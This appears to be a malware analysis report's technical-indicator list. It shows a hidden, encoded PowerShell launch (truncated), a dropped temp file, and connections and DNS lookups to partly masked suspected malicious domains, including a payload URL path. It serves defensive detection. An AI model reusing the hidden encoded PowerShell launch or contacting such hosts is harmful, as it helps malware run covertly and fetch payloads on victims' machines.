Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABKAGUAcABjAGIAcwBnAHIAZgA9ACcAUQBjAHEAdwBhAG0AeQBpAG8AJwA7ACQATgBjAGYAeQBvAGUAbgBzAGwAcwBvAGsAcAAgAD0AIAAnADcAMwAzACcAOwAkAFMAYgBlAGoAaQBsAHUAcwBpAGMAPQAnAEY...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1596
- %TEMP%\1384243.cvr
- 'ho##pam.com':443
- 'ai##as.com':443
- 'ms###ets.com':80
- http://ms###ets.com/aqua/7ew43348/
- http://www.ms###ets.com/aqua/7ew43348/
- 'ho##pam.com':443
- 'ai##as.com':443
- DNS ASK ho##pam.com
- DNS ASK ai##as.com
- DNS ASK ms###ets.com
- DNS ASK ni###e.press
- DNS ASK wa###aredd.com